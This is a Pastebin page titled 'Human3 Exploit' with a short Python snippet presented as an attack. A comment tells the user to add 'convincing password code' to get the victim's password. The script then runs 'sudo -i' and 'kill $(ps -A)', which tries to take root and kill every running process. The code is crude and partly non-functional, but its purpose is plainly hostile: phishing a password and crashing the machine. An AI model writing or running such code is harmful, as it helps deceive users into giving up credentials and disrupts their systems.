devop

Human3 Exploit | NEW!

Aug 31st, 2016
104
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.16 KB | None | 0 0
  1. import os
  2. def expcode():
  3.     #Put convincing password code here. (Get there password!)
  4.     human3()
  5. def human3():
  6.     os.system("sudo -i")
  7.     os.system("kill $(ps -A)")
Advertisement
Add Comment
Please, Sign In to add comment